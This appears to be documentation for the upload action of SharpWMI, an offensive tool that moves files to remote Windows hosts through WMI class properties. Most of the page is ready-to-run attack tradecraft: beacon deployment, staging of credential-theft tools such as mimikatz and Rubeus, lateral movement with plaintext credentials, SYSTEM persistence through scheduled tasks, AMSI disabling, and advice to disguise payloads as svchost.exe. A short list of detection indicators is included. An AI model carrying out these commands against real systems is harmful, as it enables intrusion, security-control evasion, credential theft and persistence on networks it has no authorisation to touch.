Skip to main content

Overview

The upload action transfers files to remote systems using WMI class properties as a data channel. This provides file upload capabilities without requiring SMB access or file shares.
File upload via WMI is useful when SMB ports are blocked or file share access is monitored. It operates entirely over WMI/RPC channels.

Syntax

SharpWMI.exe action=upload [computername=HOST[,HOST2,...]] source="LOCAL_PATH" dest="REMOTE_PATH" [amsi=disable] [username=DOMAIN\user] [password=Password]

Parameters

ParameterRequiredDescription
actionYesMust be upload
sourceYesLocal file path to upload
destYesDestination path on remote system
computernameNoTarget host(s), comma-separated
amsiNoSet to disable to bypass AMSI during upload
usernameNoUsername for authentication
passwordNoPassword for authentication

How It Works

1

Read Source File

Reads local file and converts to byte array
2

Create WMI Class

Creates temporary WMI class: Win32_OSRecoveryConfigurationData
3

Store in Property

Stores file bytes as comma-separated string in DebugOptions property
4

Remote Retrieval

Executes PowerShell on target to read from WMI class and write to disk
5

Verification

Queries CIM_DataFile to verify file was created
6

Cleanup

Removes temporary WMI class

Usage Examples

Basic File Upload

SharpWMI.exe action=upload computername=target.domain.com source="beacon.exe" dest="C:\Windows\temp\svchost.exe"

Example Output

  Scope: \\target.domain.com\root\cimv2
  User credentials: DOMAIN\admin

[*] Uploading file via evil WMI static class' property: DebugOptions ...
[*] Pulling contents from WMI repository to disk on a remote machine...

[*] Host                           : target.domain.com
[*] Command                        : powershell -w hidden -nop -c "$e=([WmiClass]'root\cimv2:Win32_OSRecoveryConfigurationData').Properties['DebugOptions'].Value;[IO.File]::WriteAllBytes('C:\Windows\temp\svchost.exe',[Byte[]][Int[]]($e-split','))"
[*] Creation of process returned   : 0
[*] Process ID                     : 3456

[*] Confirming whether file was uploaded...
[*] Removing evil WMI class Win32_OSRecoveryConfigurationData

[+] SUCCESS: File uploaded: svchost.exe

Operational Scenarios

Scenario 1: Beacon Deployment

# 1. Upload beacon
SharpWMI.exe action=upload computername=target.domain.com source="beacon.exe" dest="C:\Windows\temp\svchost.exe" amsi=disable

# 2. Execute beacon
SharpWMI.exe action=exec computername=target.domain.com command="C:\Windows\temp\svchost.exe"

# 3. Verify execution
SharpWMI.exe action=ps computername=target.domain.com

Scenario 2: Tool Staging

# Upload multiple tools
SharpWMI.exe action=upload computername=target.domain.com source="SharpHound.exe" dest="C:\temp\process.exe" amsi=disable

SharpWMI.exe action=upload computername=target.domain.com source="Rubeus.exe" dest="C:\temp\system.exe" amsi=disable

SharpWMI.exe action=upload computername=target.domain.com source="SharpDPAPI.exe" dest="C:\temp\service.exe" amsi=disable

Scenario 3: Lateral Movement Chain

# Upload to multiple systems
SharpWMI.exe action=upload computername=ws01,ws02,ws03,ws04,ws05 source="lateral.exe" dest="C:\Windows\temp\update.exe" amsi=disable username="DOMAIN\admin" password="Password123!"

# Execute on all systems
SharpWMI.exe action=exec computername=ws01,ws02,ws03,ws04,ws05 command="C:\Windows\temp\update.exe -c 192.168.1.100" username="DOMAIN\admin" password="Password123!"

Scenario 4: Persistence Deployment

# Upload persistence payload
SharpWMI.exe action=upload computername=target.domain.com source="persist.exe" dest="C:\Windows\System32\WindowsUpdate.exe" amsi=disable

# Create scheduled task for persistence
SharpWMI.exe action=exec computername=target.domain.com command="schtasks /create /tn WindowsUpdateCheck /tr C:\Windows\System32\WindowsUpdate.exe /sc onlogon /ru SYSTEM" result=true

File Size Considerations

Large files may cause issues with WMI property size limits and memory constraints. Test with your specific file sizes.
Recommendations:
  • Keep files under 10 MB when possible
  • Test upload with small files first
  • Use compression for larger payloads
  • Consider staging larger files via other methods
For files larger than 10 MB:
  1. Compress the file before upload
  2. Upload compressed file via WMI
  3. Extract on target using PowerShell
  4. Clean up compressed file
# Upload compressed payload
SharpWMI.exe action=upload computername=target source="payload.zip" dest="C:\temp\data.zip" amsi=disable

# Extract on target
SharpWMI.exe action=exec computername=target command="powershell -c Expand-Archive C:\temp\data.zip C:\temp\" result=true

Destination Path Guidelines

Writeable Locations

Recommended destination paths:
  • C:\Windows\temp\
  • C:\temp\
  • %APPDATA%\
  • C:\ProgramData\

Avoid Protected Paths

Paths that may fail:
  • C:\Program Files\ (requires admin)
  • C:\Windows\System32\ (protected)
  • Root of C:\ drive
  • User profile without proper access

Remote vs Local Usage

  • Local Upload
  • Remote Upload
# Upload to localhost (rare use case)
SharpWMI.exe action=upload source="file.exe" dest="C:\temp\file.exe"
Note: Local uploads are uncommon. Use standard file copy for local operations.

AMSI Evasion

When amsi=disable is specified, SharpWMI:
  1. Modifies registry to disable AMSI: HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable = 0
  2. Executes PowerShell command to write file
  3. Restores original AMSI setting
SharpWMI.exe action=upload computername=target.domain.com source="mimikatz.exe" dest="C:\temp\debug.exe" amsi=disable

Detection Considerations

  • Creation of Win32_OSRecoveryConfigurationData class
  • Unusual WMI class with large property values
  • Temporary WMI class creation and deletion
  • Event ID 5857-5861: WMI activity
  • PowerShell spawned by wmiprvse.exe
  • Command line with [IO.File]::WriteAllBytes
  • WMI class property read operations
  • Event ID 4104: PowerShell script block logging
  • File written to temp directories
  • File creation by PowerShell
  • Suspicious file names (svchost.exe, system.exe in temp)
  • Event ID 4663: File system access
  • Large data transfer over WMI/DCOM
  • Unusual WMI property queries
  • Multiple WMI operations in sequence
  • DCOM traffic on port 135

Best Practices

File Naming

  • Use legitimate-sounding names
  • Match existing system files
  • Avoid obvious malware names
  • Examples: svchost.exe, system.exe, update.exe

Path Selection

  • Use temp directories
  • Avoid monitored paths
  • Match legitimate file locations
  • Clean up after use

Operational Security

  • Always use amsi=disable
  • Test upload with small files first
  • Verify upload success before execution
  • Delete uploaded files after use

Error Handling

  • Check for SUCCESS/FAILURE messages
  • Verify file exists before execution
  • Handle upload timeouts
  • Monitor for AV detection

Troubleshooting

Cause: File not written to disk or verification failedSolution:
  • Check destination path is writeable
  • Verify sufficient disk space
  • Ensure PowerShell is available
  • Check AV didn’t quarantine file
  • Try different destination path
Cause: WMI class creation failedSolution:
  • Verify WMI service is running
  • Check admin privileges
  • Try smaller file size
  • Ensure sufficient system resources
Cause: Insufficient privilegesSolution:
  • Verify admin credentials
  • Check UAC remote restrictions
  • Ensure user can write to destination
  • Try with domain admin account
Cause: Large file or network issueSolution:
  • Reduce file size
  • Check network connectivity
  • Compress file before upload
  • Increase timeout if possible

Cleanup

After successful operations, clean up uploaded files: 
# Remove uploaded file via exec
SharpWMI.exe action=exec computername=target.domain.com command="cmd /c del C:\Windows\temp\svchost.exe" result=true

# Or via PowerShell
SharpWMI.exe action=exec computername=target.domain.com command="powershell -c Remove-Item C:\temp\*.exe -Force" result=true amsi=disable

exec

Execute uploaded files

executevbs

Alternative execution method

query

Verify file upload

ps

Check uploaded file execution

Alternative Methods

  • WMI Upload (SharpWMI)
  • SMB File Copy
  • PowerShell Remoting
Advantages:
  • No SMB required
  • Works over WMI/RPC only
  • Evades SMB monitoring
Disadvantages:
  • Slower than SMB
  • File size limitations
  • More complex detection artifacts